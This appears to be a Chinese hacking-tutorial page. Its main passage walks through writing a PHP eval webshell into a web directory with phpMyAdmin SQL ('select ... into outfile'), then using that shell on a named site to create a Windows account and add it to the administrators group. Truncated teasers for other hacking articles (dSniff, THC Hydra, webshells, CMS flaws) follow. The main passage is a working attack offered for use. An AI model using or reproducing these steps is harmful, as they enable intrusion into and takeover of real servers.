首先用暴路径漏洞找到绝对路径,然后替换下面的路径
随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell)
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘D:\www\dmtz\bbs\upload\phpmyadmin\eval.php‘;
Drop TABLE IF EXISTS a;
这是我们的后门
http://chncto.com/phpmyadmin/eval.php
加个系统帐号
http://chncto.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://chncto.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add
什么叫dSniff? dSniff是由Dug Song建立的数据流量剖析和登陆密码嗅探工具,用以分析各种各样运用协议书并获取有关数据信息。dsniff,mailsnarf,filesnarf,msg...
我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了 或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处理。 如何加...
在一些好莱坞电影中,我们经常看到超级黑客在电脑前“侵入”别人的安全系统。你能熟练、轻松地输入很多复杂的代码,而且不会一下子全部入侵/破解,这是不是令人羡慕?事实上,我们也可以像电影和游戏中的黑客一样攻...
原创作者:泪舞 Qq:8109217 ( 转载请写上作者名 ) 动易CMS、我相信大家都不陌生吧?互联网很多企业站点都是用的动易...
黑客是怎样找到电脑漏洞的:为了把损失降低到最低限度,我们一定要有安全观念,并掌握一定的安全防范措施,禁绝让黑客无任何机会可趁。下面我们就来研究一下那些黑客是如何找到你计算机中的安全漏洞的,只有了解...
什么叫THC Hydra? THC Hydra是一种密码破解专用工具,能够 对超出五十种协议书实行十分快的词典进攻。它是一个迅速平稳的互联网登陆黑客工具,它应用词典或暴力行为进攻来试着登陆页面上的各...